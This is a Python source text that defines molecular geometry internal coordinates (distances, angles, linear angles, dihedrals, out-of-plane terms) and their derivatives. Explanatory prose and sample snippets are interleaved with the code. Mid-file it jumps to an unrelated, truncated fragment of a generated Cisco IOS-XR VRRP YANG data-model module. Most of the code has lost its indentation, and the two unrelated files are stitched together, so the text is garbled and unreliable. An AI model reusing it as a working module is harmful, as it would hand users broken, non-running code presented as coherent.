self.w = w
if self.a not in Rotators:
Rotators[self.a] = Rotator(self.a, x0)
self.Rotator = Rotators[self.a]
self.isAngular = True
self.isPeriodic = False
def __repr__(self):
# return "Rotation-B %s : Weight %.3f" % (' '.join([str(i+1) for i in self.a]), self.w)
return "Rotation-B %s" % (commadash(self.a))
@property
def atoms(self):
return list(self.a)
def __eq__(self, other):
if type(self) is not type(other): return False
eq = set(self.a) == set(other.a)
# if eq and np.sum((self.w-other.w)**2) > 1e-6:
# print "Warning: RotationB same atoms, different weights"
# if eq and np.sum((self.x0-other.x0)**2) > 1e-6:
# print "Warning: RotationB same atoms, different reference positions"
return eq
def __ne__(self, other):
return not self.__eq__(other)
def value(self, xyz):
return self.Rotator.value(xyz)[1]*self.w
def derivative(self, xyz):
der_all = self.Rotator.derivative(xyz)
derivatives = der_all[:, :, 1]*self.w
return derivatives
class RotationC(object):
__slots__=['a','x0','w','Rotator','isAngular','isPeriodic']
def __init__(self, a, x0, Rotators, w=1.0):
self.a = tuple(sorted(a))
self.x0 = x0
self.w = w
if self.a not in Rotators:
Rotators[self.a] = Rotator(self.a, x0)
self.Rotator = Rotators[self.a]
self.isAngular = True
self.isPeriodic = False
def __repr__(self):
# return "Rotation-C %s : Weight %.3f" % (' '.join([str(i+1) for i in self.a]), self.w)
return "Rotation-C %s" % (commadash(self.a))
@property
def atoms(self):
return list(self.a)
def __eq__(self, other):
if type(self) is not type(other): return False
eq = set(self.a) == set(other.a)
# if eq and np.sum((self.w-other.w)**2) > 1e-6:
# print "Warning: RotationC same atoms, different weights"
# if eq and np.sum((self.x0-other.x0)**2) > 1e-6:
# print "Warning: RotationC same atoms, different reference positions"
return eq
def __ne__(self, other):
return not self.__eq__(other)
def value(self, xyz):
return self.Rotator.value(xyz)[2]*self.w
def derivative(self, xyz):
der_all = self.Rotator.derivative(xyz)
derivatives = der_all[:, :, 2]*self.w
return derivatives
class Distance(object):
__slots__=['a','b','isAngular','isPeriodic']
def __init__(self, a, b):
self.a = a
self.b = b
if a == b:
raise RuntimeError('a and b must be different')
self.isAngular = False
self.isPeriodic = False
def __repr__(self):
return "Distance %i-%i" % (self.a+1, self.b+1)
@property
def atoms(self):
return [self.a,self.b]
def __eq__(self, other):
if type(self) is not type(other): return False
if self.a == other.a:
if self.b == other.b:
return True
if self.a == other.b:
if self.b == other.a:
return True
return False
def __ne__(self, other):
return not self.__eq__(other)
def value(self, xyz):
xyz = xyz.reshape(-1,3)
a = self.a
b = self.b
return np.sqrt(np.sum((xyz[a]-xyz[b])**2))
def derivative(self, xyz):
xyz = xyz.reshape(-1,3)
derivatives = np.zeros_like(xyz)
m = self.a
n = self.b
u = (xyz[m] - xyz[n]) / np.linalg.norm(xyz[m] - xyz[n])
derivatives[m, :] = u
derivatives[n, :] = -u
return derivatives
class Angle(object):
__slots__=['a','b','c','isAngular','isPeriodic']
def __init__(self, a, b, c):
self.a = a
self.b = b
self.c = c
self.isAngular = True
self.isPeriodic = False
if len({a, b, c}) != 3:
raise RuntimeError('a, b, and c must be different')
def __repr__(self):
return "Angle %i-%i-%i" % (self.a+1, self.b+1, self.c+1)
@property
def atoms(self):
return [self.a,self.b,self.c]
def __eq__(self, other):
if type(self) is not type(other): return False
if self.b == other.b:
if self.a == other.a:
if self.c == other.c:
return True
if self.a == other.c:
if self.c == other.a:
return True
return False
def __ne__(self, other):
return not self.__eq__(other)
def value(self, xyz):
xyz = xyz.reshape(-1,3)
a = self.a
b = self.b
c = self.c
# vector from first atom to central atom
vector1 = xyz[a] - xyz[b]
# vector from last atom to central atom
vector2 = xyz[c] - xyz[b]
# norm of the two vectors
norm1 = np.sqrt(np.sum(vector1**2))
norm2 = np.sqrt(np.sum(vector2**2))
dot = np.dot(vector1, vector2)
        # Catch the rare case where roundoff pushes the cosine slightly outside [-1, 1].
        if dot / (norm1 * norm2) <= -1.0:
            if (np.abs(dot / (norm1 * norm2)) - 1.0) > 1e-6:
                raise RuntimeError('Encountered invalid value in angle')
            return np.pi
        if dot / (norm1 * norm2) >= 1.0:
            if (np.abs(dot / (norm1 * norm2)) - 1.0) > 1e-6:
                raise RuntimeError('Encountered invalid value in angle')
            return 0.0
return np.arccos(dot / (norm1 * norm2))
def normal_vector(self, xyz):
xyz = xyz.reshape(-1,3)
a = self.a
b = self.b
c = self.c
# vector from first atom to central atom
vector1 = xyz[a] - xyz[b]
# vector from last atom to central atom
vector2 = xyz[c] - xyz[b]
# norm of the two vectors
norm1 = np.sqrt(np.sum(vector1**2))
norm2 = np.sqrt(np.sum(vector2**2))
crs = np.cross(vector1, vector2)
crs /= np.linalg.norm(crs)
return crs
def derivative(self, xyz):
xyz = xyz.reshape(-1,3)
derivatives = np.zeros_like(xyz)
m = self.a
o = self.b
n = self.c
# Unit displacement vectors
u_prime = (xyz[m] - xyz[o])
u_norm = np.linalg.norm(u_prime)
v_prime = (xyz[n] - xyz[o])
v_norm = np.linalg.norm(v_prime)
u = u_prime / u_norm
v = v_prime / v_norm
VECTOR1 = np.array([1, -1, 1]) / np.sqrt(3)
VECTOR2 = np.array([-1, 1, 1]) / np.sqrt(3)
if np.linalg.norm(u + v) < 1e-10 or np.linalg.norm(u - v) < 1e-10:
# if they're parallel
if ((np.linalg.norm(u + VECTOR1) < 1e-10) or
(np.linalg.norm(u - VECTOR2) < 1e-10)):
                # and they're parallel to [1, -1, 1]
w_prime = np.cross(u, VECTOR2)
else:
w_prime = np.cross(u, VECTOR1)
else:
w_prime = np.cross(u, v)
w = w_prime / np.linalg.norm(w_prime)
term1 = np.cross(u, w) / u_norm
term2 = np.cross(w, v) / v_norm
derivatives[m, :] = term1
derivatives[n, :] = term2
derivatives[o, :] = -(term1 + term2)
return derivatives
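On simple geometries the arccos formula in `value` reduces to familiar numbers. A stand-alone sketch (the `angle_value` helper is an illustrative name; `np.clip` stands in for the explicit out-of-range branches above) recovers the 90-degree angle of three atoms on the coordinate axes:

```python
import numpy as np

def angle_value(xyz, a, b, c):
    # angle at vertex b, same cosine formula as Angle.value
    v1 = xyz[a] - xyz[b]
    v2 = xyz[c] - xyz[b]
    cosine = np.dot(v1, v2) / (np.linalg.norm(v1) * np.linalg.norm(v2))
    # clamp guards against roundoff pushing the cosine outside [-1, 1]
    return np.arccos(np.clip(cosine, -1.0, 1.0))

xyz = np.array([[1.0, 0.0, 0.0],
                [0.0, 0.0, 0.0],
                [0.0, 1.0, 0.0]])
theta = angle_value(xyz, 0, 1, 2)
assert abs(theta - np.pi / 2) < 1e-12
```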
class LinearAngle(object):
__slots__=['a','b','c','axis','e0','stored_dot2','isAngular','isPeriodic']
def __init__(self, a, b, c, axis):
self.a = a
self.b = b
self.c = c
self.axis = axis
self.isAngular = False
self.isPeriodic = False
if len({a, b, c}) != 3:
raise RuntimeError('a, b, and c must be different')
self.e0 = None
self.stored_dot2 = 0.0
@property
def atoms(self):
return [self.a,self.b,self.c]
def reset(self, xyz):
xyz = xyz.reshape(-1,3)
a = self.a
b = self.b
c = self.c
# Unit vector pointing from a to c.
v = xyz[c] - xyz[a]
ev = v / np.linalg.norm(v)
# Cartesian axes.
ex = np.array([1.0,0.0,0.0])
ey = np.array([0.0,1.0,0.0])
ez = np.array([0.0,0.0,1.0])
self.e0 = [ex, ey, ez][np.argmin([np.dot(i, ev)**2 for i in [ex, ey, ez]])]
self.stored_dot2 = 0.0
def __repr__(self):
return "LinearAngle%s %i-%i-%i" % (["X","Y"][self.axis], self.a+1, self.b+1, self.c+1)
    def __eq__(self, other):
        if type(self) is not type(other): return False
        if self.axis != other.axis: return False
if self.b == other.b:
if self.a == other.a:
if self.c == other.c:
return True
if self.a == other.c:
if self.c == other.a:
return True
return False
def __ne__(self, other):
return not self.__eq__(other)
def value(self, xyz):
"""
This function measures the displacement of the BA and BC unit
vectors in the linear angle "ABC". The displacements are measured
along two axes that are perpendicular to the AC unit vector.
"""
xyz = xyz.reshape(-1,3)
a = self.a
b = self.b
c = self.c
# Unit vector pointing from a to c.
v = xyz[c] - xyz[a]
ev = v / np.linalg.norm(v)
if self.e0 is None: self.reset(xyz)
e0 = self.e0
self.stored_dot2 = np.dot(ev, e0)**2
# Now make two unit vectors that are perpendicular to this one.
c1 = np.cross(ev, e0)
e1 = c1 / np.linalg.norm(c1)
c2 = np.cross(ev, e1)
e2 = c2 / np.linalg.norm(c2)
# BA and BC unit vectors in ABC angle
vba = xyz[a]-xyz[b]
eba = vba / np.linalg.norm(vba)
vbc = xyz[c]-xyz[b]
ebc = vbc / np.linalg.norm(vbc)
if self.axis == 0:
answer = np.dot(eba, e1) + np.dot(ebc, e1)
else:
answer = np.dot(eba, e2) + np.dot(ebc, e2)
return answer
def derivative(self, xyz):
xyz = xyz.reshape(-1,3)
a = self.a
b = self.b
c = self.c
derivatives = np.zeros_like(xyz)
## Finite difference derivatives
## fderivatives = np.zeros_like(xyz)
## h = 1e-6
## for u in range(xyz.shape[0]):
## for v in range(3):
## xyz[u, v] += h
## vPlus = self.value(xyz)
## xyz[u, v] -= 2*h
## vMinus = self.value(xyz)
## xyz[u, v] += h
## fderivatives[u, v] = (vPlus-vMinus)/(2*h)
# Unit vector pointing from a to c.
v = xyz[c] - xyz[a]
ev = v / np.linalg.norm(v)
if self.e0 is None: self.reset(xyz)
e0 = self.e0
c1 = np.cross(ev, e0)
e1 = c1 / np.linalg.norm(c1)
c2 = np.cross(ev, e1)
e2 = c2 / np.linalg.norm(c2)
# BA and BC unit vectors in ABC angle
vba = xyz[a]-xyz[b]
eba = vba / np.linalg.norm(vba)
vbc = xyz[c]-xyz[b]
ebc = vbc / np.linalg.norm(vbc)
# Derivative terms
de0 = np.zeros((3, 3), dtype=float)
dev = d_unit_vector(v)
dc1 = d_cross_ab(ev, e0, dev, de0)
de1 = np.dot(dc1, d_unit_vector(c1))
dc2 = d_cross_ab(ev, e1, dev, de1)
de2 = np.dot(dc2, d_unit_vector(c2))
deba = d_unit_vector(vba)
debc = d_unit_vector(vbc)
if self.axis == 0:
derivatives[a, :] = np.dot(deba, e1) + np.dot(-de1, eba) + np.dot(-de1, ebc)
derivatives[b, :] = np.dot(-deba, e1) + np.dot(-debc, e1)
derivatives[c, :] = np.dot(de1, eba) + np.dot(de1, ebc) + np.dot(debc, e1)
else:
derivatives[a, :] = np.dot(deba, e2) + np.dot(-de2, eba) + np.dot(-de2, ebc)
derivatives[b, :] = np.dot(-deba, e2) + np.dot(-debc, e2)
derivatives[c, :] = np.dot(de2, eba) + np.dot(de2, ebc) + np.dot(debc, e2)
## Finite difference derivatives
## if np.linalg.norm(derivatives - fderivatives) > 1e-6:
## print np.linalg.norm(derivatives - fderivatives)
## raise Exception()
return derivatives
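The docstring's construction, two axes perpendicular to the A-C unit vector with the least-aligned Cartesian axis as the reference `e0`, can be traced in a stand-alone sketch (plain NumPy, no module classes); for a perfectly linear A-B-C chain both displacement coordinates vanish:

```python
import numpy as np

# A perfectly linear arrangement A-B-C along the x axis.
xyz = np.array([[0.0, 0.0, 0.0],
                [1.0, 0.0, 0.0],
                [2.0, 0.0, 0.0]])
v = xyz[2] - xyz[0]
ev = v / np.linalg.norm(v)
# Reference axis: the Cartesian axis least aligned with ev.
axes = np.eye(3)
e0 = axes[np.argmin([np.dot(ax, ev) ** 2 for ax in axes])]
# Two unit vectors perpendicular to ev.
e1 = np.cross(ev, e0)
e1 /= np.linalg.norm(e1)
e2 = np.cross(ev, e1)
e2 /= np.linalg.norm(e2)
# BA and BC unit vectors of the "angle".
eba = (xyz[0] - xyz[1]) / np.linalg.norm(xyz[0] - xyz[1])
ebc = (xyz[2] - xyz[1]) / np.linalg.norm(xyz[2] - xyz[1])
coord1 = np.dot(eba, e1) + np.dot(ebc, e1)
coord2 = np.dot(eba, e2) + np.dot(ebc, e2)
assert abs(coord1) < 1e-12 and abs(coord2) < 1e-12
```

Bending atom B off the axis makes one or both coordinates nonzero, which is what the two `LinearAngle` instances (axis 0 and 1) track.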
class MultiAngle(object):
__slots__=['a','b','c','isAngular','isPeriodic']
def __init__(self, a, b, c):
if type(a) is int:
a = (a,)
if type(c) is int:
c = (c,)
self.a = tuple(a)
self.b = b
self.c = tuple(c)
self.isAngular = True
self.isPeriodic = False
        if len({self.a, self.b, self.c}) != 3:
raise RuntimeError('a, b, and c must be different')
def __repr__(self):
stra = ("("+','.join(["%i" % (i+1) for i in self.a])+")") if len(self.a) > 1 else "%i" % (self.a[0]+1)
strc = ("("+','.join(["%i" % (i+1) for i in self.c])+")") if len(self.c) > 1 else "%i" % (self.c[0]+1)
return "%sAngle %s-%i-%s" % ("Multi" if (len(self.a) > 1 or len(self.c) > 1) else "", stra, self.b+1, strc)
def __eq__(self, other):
if type(self) is not type(other): return False
if self.b == other.b:
if set(self.a) == set(other.a):
if set(self.c) == set(other.c):
return True
if set(self.a) == set(other.c):
if set(self.c) == set(other.a):
return True
return False
def __ne__(self, other):
return not self.__eq__(other)
def value(self, xyz):
xyz = xyz.reshape(-1,3)
a = np.array(self.a)
b = self.b
c = np.array(self.c)
xyza = np.mean(xyz[a], axis=0)
xyzc = np.mean(xyz[c], axis=0)
# vector from first atom to central atom
vector1 = xyza - xyz[b]
# vector from last atom to central atom
vector2 = xyzc - xyz[b]
# norm of the two vectors
norm1 = np.sqrt(np.sum(vector1**2))
norm2 = np.sqrt(np.sum(vector2**2))
dot = np.dot(vector1, vector2)
        # Catch the rare case where roundoff pushes the cosine slightly outside [-1, 1].
        if dot / (norm1 * norm2) <= -1.0:
            if (np.abs(dot / (norm1 * norm2)) - 1.0) > 1e-6:
                raise RuntimeError('Encountered invalid value in angle')
            return np.pi
        if dot / (norm1 * norm2) >= 1.0:
            if (np.abs(dot / (norm1 * norm2)) - 1.0) > 1e-6:
                raise RuntimeError('Encountered invalid value in angle')
            return 0.0
        return np.arccos(dot / (norm1 * norm2))
def normal_vector(self, xyz):
xyz = xyz.reshape(-1,3)
a = np.array(self.a)
b = self.b
c = np.array(self.c)
xyza = np.mean(xyz[a], axis=0)
xyzc = np.mean(xyz[c], axis=0)
# vector from first atom to central atom
vector1 = xyza - xyz[b]
# vector from last atom to central atom
vector2 = xyzc - xyz[b]
# norm of the two vectors
norm1 = np.sqrt(np.sum(vector1**2))
norm2 = np.sqrt(np.sum(vector2**2))
crs = np.cross(vector1, vector2)
crs /= np.linalg.norm(crs)
return crs
def derivative(self, xyz):
xyz = xyz.reshape(-1,3)
derivatives = np.zeros_like(xyz)
m = np.array(self.a)
o = self.b
n = np.array(self.c)
xyzm = np.mean(xyz[m], axis=0)
xyzn = np.mean(xyz[n], axis=0)
# Unit displacement vectors
u_prime = (xyzm - xyz[o])
u_norm = np.linalg.norm(u_prime)
v_prime = (xyzn - xyz[o])
v_norm = np.linalg.norm(v_prime)
u = u_prime / u_norm
v = v_prime / v_norm
VECTOR1 = np.array([1, -1, 1]) / np.sqrt(3)
VECTOR2 = np.array([-1, 1, 1]) / np.sqrt(3)
if np.linalg.norm(u + v) < 1e-10 or np.linalg.norm(u - v) < 1e-10:
# if they're parallel
if ((np.linalg.norm(u + VECTOR1) < 1e-10) or
(np.linalg.norm(u - VECTOR2) < 1e-10)):
                # and they're parallel to [1, -1, 1]
w_prime = np.cross(u, VECTOR2)
else:
w_prime = np.cross(u, VECTOR1)
else:
w_prime = np.cross(u, v)
w = w_prime / np.linalg.norm(w_prime)
term1 = np.cross(u, w) / u_norm
term2 = np.cross(w, v) / v_norm
for i in m:
derivatives[i, :] = term1/len(m)
for i in n:
derivatives[i, :] = term2/len(n)
derivatives[o, :] = -(term1 + term2)
return derivatives
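`MultiAngle` replaces the end atoms by centroids of atom groups. A minimal stand-alone sketch of the `value` computation on two two-atom groups whose centroids sit on the x and y axes (illustrative data, not from this module):

```python
import numpy as np

# Group a straddles (1, 0, 0); group c straddles (0, 1, 0); vertex b at the origin.
xyz = np.array([[1.0, 0.1, 0.0], [1.0, -0.1, 0.0],   # group a
                [0.0, 0.0, 0.0],                      # vertex b
                [0.0, 1.0, 0.1], [0.0, 1.0, -0.1]])   # group c
xyza = xyz[[0, 1]].mean(axis=0)   # centroid of group a
xyzc = xyz[[3, 4]].mean(axis=0)   # centroid of group c
v1 = xyza - xyz[2]
v2 = xyzc - xyz[2]
cosine = np.dot(v1, v2) / (np.linalg.norm(v1) * np.linalg.norm(v2))
theta = np.arccos(np.clip(cosine, -1.0, 1.0))
assert abs(theta - np.pi / 2) < 1e-12
```

In `derivative` the corresponding gradient term is spread evenly over each group, hence the `term1/len(m)` and `term2/len(n)` assignments above.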
class Dihedral(object):
__slots__=['a','b','c','d','isAngular','isPeriodic']
def __init__(self, a, b, c, d):
self.a = a
self.b = b
self.c = c
self.d = d
self.isAngular = True
self.isPeriodic = True
if len({a, b, c, d}) != 4:
raise RuntimeError('a, b, c and d must be different')
def __repr__(self):
return "Dihedral %i-%i-%i-%i" % (self.a+1, self.b+1, self.c+1, self.d+1)
@property
def atoms(self):
return [self.a,self.b,self.c,self.d]
def __eq__(self, other):
if type(self) is not type(other): return False
if self.a == other.a:
if self.b == other.b:
if self.c == other.c:
if self.d == other.d:
return True
if self.a == other.d:
if self.b == other.c:
if self.c == other.b:
if self.d == other.a:
return True
return False
def __ne__(self, other):
return not self.__eq__(other)
def value(self, xyz):
xyz = xyz.reshape(-1,3)
a = self.a
b = self.b
c = self.c
d = self.d
vec1 = xyz[b] - xyz[a]
vec2 = xyz[c] - xyz[b]
vec3 = xyz[d] - xyz[c]
cross1 = np.cross(vec2, vec3)
cross2 = np.cross(vec1, vec2)
arg1 = np.sum(np.multiply(vec1, cross1)) * \
np.sqrt(np.sum(vec2**2))
arg2 = np.sum(np.multiply(cross1, cross2))
answer = np.arctan2(arg1, arg2)
return answer
def derivative(self, xyz):
xyz = xyz.reshape(-1,3)
derivatives = np.zeros_like(xyz)
m = self.a
o = self.b
p = self.c
n = self.d
u_prime = (xyz[m] - xyz[o])
w_prime = (xyz[p] - xyz[o])
v_prime = (xyz[n] - xyz[p])
u_norm = np.linalg.norm(u_prime)
w_norm = np.linalg.norm(w_prime)
v_norm = np.linalg.norm(v_prime)
u = u_prime / u_norm
w = w_prime / w_norm
v = v_prime / v_norm
if (1 - np.dot(u, w)**2) < 1e-6:
term1 = np.cross(u, w) * 0
term3 = np.cross(u, w) * 0
else:
term1 = np.cross(u, w) / (u_norm * (1 - np.dot(u, w)**2))
term3 = np.cross(u, w) * np.dot(u, w) / (w_norm * (1 - np.dot(u, w)**2))
if (1 - np.dot(v, w)**2) < 1e-6:
term2 = np.cross(v, w) * 0
term4 = np.cross(v, w) * 0
else:
term2 = np.cross(v, w) / (v_norm * (1 - np.dot(v, w)**2))
term4 = np.cross(v, w) * np.dot(v, w) / (w_norm * (1 - np.dot(v, w)**2))
# term1 = np.cross(u, w) / (u_norm * (1 - np.dot(u, w)**2))
# term2 = np.cross(v, w) / (v_norm * (1 - np.dot(v, w)**2))
# term3 = np.cross(u, w) * np.dot(u, w) / (w_norm * (1 - np.dot(u, w)**2))
# term4 = np.cross(v, w) * np.dot(v, w) / (w_norm * (1 - np.dot(v, w)**2))
derivatives[m, :] = term1
derivatives[n, :] = -term2
derivatives[o, :] = -term1 + term3 - term4
derivatives[p, :] = term2 - term3 + term4
return derivatives
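The arctan2 form used in `value` returns a signed torsion in (-pi, pi]. A stand-alone sketch (the `dihedral_value` helper is an illustrative name) on four points with a quarter-turn about the b-c axis:

```python
import numpy as np

def dihedral_value(xyz, a, b, c, d):
    # same arctan2 formulation as Dihedral.value above
    vec1 = xyz[b] - xyz[a]
    vec2 = xyz[c] - xyz[b]
    vec3 = xyz[d] - xyz[c]
    cross1 = np.cross(vec2, vec3)
    cross2 = np.cross(vec1, vec2)
    arg1 = np.dot(vec1, cross1) * np.linalg.norm(vec2)
    arg2 = np.dot(cross1, cross2)
    return np.arctan2(arg1, arg2)

# a on the x axis, b-c along z, d displaced along y: a 90-degree torsion.
xyz = np.array([[1.0, 0.0, 0.0],
                [0.0, 0.0, 0.0],
                [0.0, 0.0, 1.0],
                [0.0, 1.0, 1.0]])
phi = dihedral_value(xyz, 0, 1, 2, 3)
assert abs(phi - np.pi / 2) < 1e-12
```

Unlike an arccos formulation, arctan2 keeps the sign of the torsion and avoids the derivative blow-up at 0 and pi.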
class MultiDihedral(object):
__slots__=['a','b','c','d','isAngular','isPeriodic']
def __init__(self, a, b, c, d):
if type(a) is int:
a = (a, )
if type(d) is int:
d = (d, )
self.a = tuple(a)
self.b = b
self.c = c
self.d = tuple(d)
self.isAngular = True
self.isPeriodic = True
        if len({self.a, self.b, self.c, self.d}) != 4:
raise RuntimeError('a, b, c and d must be different')
def __repr__(self):
stra = ("("+','.join(["%i" % (i+1) for i in self.a])+")") if len(self.a) > 1 else "%i" % (self.a[0]+1)
strd = ("("+','.join(["%i" % (i+1) for i in self.d])+")") if len(self.d) > 1 else "%i" % (self.d[0]+1)
return "%sDihedral %s-%i-%i-%s" % ("Multi" if (len(self.a) > 1 or len(self.d) > 1) else "", stra, self.b+1, self.c+1, strd)
def __eq__(self, other):
if type(self) is not type(other): return False
if set(self.a) == set(other.a):
if self.b == other.b:
if self.c == other.c:
if set(self.d) == set(other.d):
return True
if set(self.a) == set(other.d):
if self.b == other.c:
if self.c == other.b:
if set(self.d) == set(other.a):
return True
return False
def __ne__(self, other):
return not self.__eq__(other)
def value(self, xyz):
xyz = xyz.reshape(-1,3)
a = np.array(self.a)
b = self.b
c = self.c
d = np.array(self.d)
xyza = np.mean(xyz[a], axis=0)
xyzd = np.mean(xyz[d], axis=0)
vec1 = xyz[b] - xyza
vec2 = xyz[c] - xyz[b]
vec3 = xyzd - xyz[c]
cross1 = np.cross(vec2, vec3)
cross2 = np.cross(vec1, vec2)
arg1 = np.sum(np.multiply(vec1, cross1)) * \
np.sqrt(np.sum(vec2**2))
arg2 = np.sum(np.multiply(cross1, cross2))
answer = np.arctan2(arg1, arg2)
return answer
def derivative(self, xyz):
xyz = xyz.reshape(-1,3)
derivatives = np.zeros_like(xyz)
m = np.array(self.a)
o = self.b
p = self.c
n = np.array(self.d)
xyzm = np.mean(xyz[m], axis=0)
xyzn = np.mean(xyz[n], axis=0)
u_prime = (xyzm - xyz[o])
w_prime = (xyz[p] - xyz[o])
v_prime = (xyzn - xyz[p])
u_norm = np.linalg.norm(u_prime)
w_norm = np.linalg.norm(w_prime)
v_norm = np.linalg.norm(v_prime)
u = u_prime / u_norm
w = w_prime / w_norm
v = v_prime / v_norm
if (1 - np.dot(u, w)**2) < 1e-6:
term1 = np.cross(u, w) * 0
term3 = np.cross(u, w) * 0
else:
term1 = np.cross(u, w) / (u_norm * (1 - np.dot(u, w)**2))
term3 = np.cross(u, w) * np.dot(u, w) / (w_norm * (1 - np.dot(u, w)**2))
if (1 - np.dot(v, w)**2) < 1e-6:
term2 = np.cross(v, w) * 0
term4 = np.cross(v, w) * 0
else:
term2 = np.cross(v, w) / (v_norm * (1 - np.dot(v, w)**2))
term4 = np.cross(v, w) * np.dot(v, w) / (w_norm * (1 - np.dot(v, w)**2))
# term1 = np.cross(u, w) / (u_norm * (1 - np.dot(u, w)**2))
# term2 = np.cross(v, w) / (v_norm * (1 - np.dot(v, w)**2))
# term3 = np.cross(u, w) * np.dot(u, w) / (w_norm * (1 - np.dot(u, w)**2))
# term4 = np.cross(v, w) * np.dot(v, w) / (w_norm * (1 - np.dot(v, w)**2))
for i in self.a:
derivatives[i, :] = term1/len(self.a)
for i in self.d:
derivatives[i, :] = -term2/len(self.d)
derivatives[o, :] = -term1 + term3 - term4
derivatives[p, :] = term2 - term3 + term4
return derivatives
class OutOfPlane(object):
__slots__=['a','b','c','d','isAngular','isPeriodic']
def __init__(self, a, b, c, d):
self.a = a
self.b = b
self.c = c
self.d = d
self.isAngular = True
self.isPeriodic = True
if len({a, b, c, d}) != 4:
raise RuntimeError('a, b, c and d must be different')
def __repr__(self):
return "Out-of-Plane %i-%i-%i-%i" % (self.a+1, self.b+1, self.c+1, self.d+1)
@property
def atoms(self):
return [self.a,self.b,self.c,self.d]
def __eq__(self, other):
if type(self) is not type(other): return False
if self.a == other.a:
if {self.b, self.c, self.d} == {other.b, other.c, other.d}:
if [self.b, self.c, self.d] != [other.b, other.c, other.d]:
                    logger.warning("Warning: OutOfPlane atoms are the same but in a different order")
return True
# if self.b == other.b:
# if self.c == other.c:
# if self.d == other.d:
# return True
# if self.a == other.d:
# if self.b == other.c:
# if self.c == other.b:
# if self.d == other.a:
# return True
return False
def __ne__(self, other):
return not self.__eq__(other)
def value(self, xyz):
xyz = xyz.reshape(-1,3)
a = self.a
b = self.b
c = self.c
d = self.d
vec1 = xyz[b] - xyz[a]
vec2 = xyz[c] - xyz[b]
vec3 = xyz[d] - xyz[c]
cross1 = np.cross(vec2, vec3)
cross2 = np.cross(vec1, vec2)
arg1 = np.sum(np.multiply(vec1, cross1)) * \
np.sqrt(np.sum(vec2**2))
arg2 = np.sum(np.multiply(cross1, cross2))
answer = np.arctan2(arg1, arg2)
return answer
def derivative(self, xyz):
xyz = xyz.reshape(-1,3)
derivatives = np.zeros_like(xyz)
m = self.a
o = self.b
p = self.c
n = self.d
u_prime = (xyz[m] - xyz[o])
w_prime = (xyz[p] - xyz[o])
v_prime = (xyz[n] - xyz[p])
u_norm = np.linalg.norm(u_prime)
w_norm = np.linalg.norm(w_prime)
v_norm = np.linalg.norm(v_prime)
u = u_prime / u_norm
w = w_prime / w_norm
v = v_prime / v_norm
if (1 - np.dot(u, w)**2) < 1e-6:
term1 = np.cross(u, w) * 0
term3 = np.cross(u, w) * 0
else:
term1 = np.cross(u, w) / (u_norm * (1 - np.dot(u, w)**2))
term3 = np.cross(u, w) * np.dot(u, w) / (w_norm * (1 - np.dot(u, w)**2))
if (1 - np.dot(v, w)**2) < 1e-6:
term2 = np.cross(v, w) * 0
term4 = np.cross(v, w) * 0
else:
term2 = np.cross(v, w) / (v_norm * (1 - np.dot(v, w)**2))
term4 = np.cross(v, w) * np.dot(v, w) / (w_norm * (1 - np.dot(v, w)**2))
# term1 = np.cross(u, w) / (u_norm * (1 - np.dot(u, w)**2))
# term2 = np.cross(v, w) / (v_norm * (1 - np.dot(v, w)**2))
# term3 = np.cross(u, w) * np.dot(u, w) / (w_norm * (1 - np.dot(u, w)**2))
# term4 = np.cross(v, w) * np.dot(v, w) / (w_norm * (1 - np.dot(v, w)**2))
derivatives[m, :] = term1
derivatives[n, :] = -term2
derivatives[o, :] = -term1 + term3 - term4
derivatives[p, :] = term2 - term3 + term4
return derivatives
def logArray(mat, precision=3, fmt="f"):
    fmt = "%% .%i%s" % (precision, fmt)
    if len(mat.shape) == 1:
        # Emit the whole vector as a single log record.
        logger.info(' '.join(fmt % mat[i] for i in range(mat.shape[0])))
    elif len(mat.shape) == 2:
        # Emit one log record per row.
        for i in range(mat.shape[0]):
            logger.info(' '.join(fmt % mat[i, j] for j in range(mat.shape[1])))
    else:
        raise RuntimeError("One or two dimensional arrays only")
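The element format that `logArray` builds ("%% .3f" collapses to "% .3f", with one column reserved for the sign) can be factored into a small helper; a stand-alone sketch, where `format_row` is an illustrative name:

```python
import numpy as np

def format_row(row, precision=3, fmt="f"):
    # "%% .%i%s" % (3, "f") -> "% .3f": space flag pads positives to align with negatives
    elem_fmt = "%% .%i%s" % (precision, fmt)
    return " ".join(elem_fmt % x for x in row)

line = format_row(np.array([1.23456, -7.0]))
# -> " 1.235 -7.000"
assert line == " 1.235 -7.000"
```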
This module contains a collection of YANG definitions
for Cisco IOS\-XR ipv4\-vrrp package operational data.
This module contains definitions
for the following management objects\:
vrrp\: VRRP operational data
Copyright (c) 2013\-2018 by Cisco Systems, Inc.
All rights reserved.
"""
import sys
from collections import OrderedDict
from ydk.types import Entity as _Entity_
from ydk.types import EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.filters import YFilter
from ydk.errors import YError, YModelError
from ydk.errors.error_handler import handle_type_error as _handle_type_error
class VrrpBAf(Enum):
"""
VrrpBAf (Enum Class)
Vrrp b af
.. data:: address_family_ipv4 = 0
IPv4 Address Family
.. data:: address_family_ipv6 = 1
IPv6 Address Family
.. data:: vrrp_baf_count = 2
    Number of Address Families
"""
address_family_ipv4 = Enum.YLeaf(0, "address-family-ipv4")
address_family_ipv6 = Enum.YLeaf(1, "address-family-ipv6")
vrrp_baf_count = Enum.YLeaf(2, "vrrp-baf-count")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['VrrpBAf']
class VrrpBagProtocolState(Enum):
"""
VrrpBagProtocolState (Enum Class)
VRRP protocol state
.. data:: state_initial = 1
Initial
.. data:: state_backup = 2
Backup
.. data:: state_master = 3
Master
"""
state_initial = Enum.YLeaf(1, "state-initial")
state_backup = Enum.YLeaf(2, "state-backup")
state_master = Enum.YLeaf(3, "state-master")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['VrrpBagProtocolState']
class VrrpBfdSessionState(Enum):
"""
VrrpBfdSessionState (Enum Class)
Vrrp bfd session state
.. data:: bfd_state_none = 0
None
.. data:: bfd_state_inactive = 1
Inactive
.. data:: bfd_state_up = 2
Up
.. data:: bfd_state_down = 3
Down
"""
bfd_state_none = Enum.YLeaf(0, "bfd-state-none")
bfd_state_inactive = Enum.YLeaf(1, "bfd-state-inactive")
bfd_state_up = Enum.YLeaf(2, "bfd-state-up")
bfd_state_down = Enum.YLeaf(3, "bfd-state-down")
@staticmethod
def _meta_info():
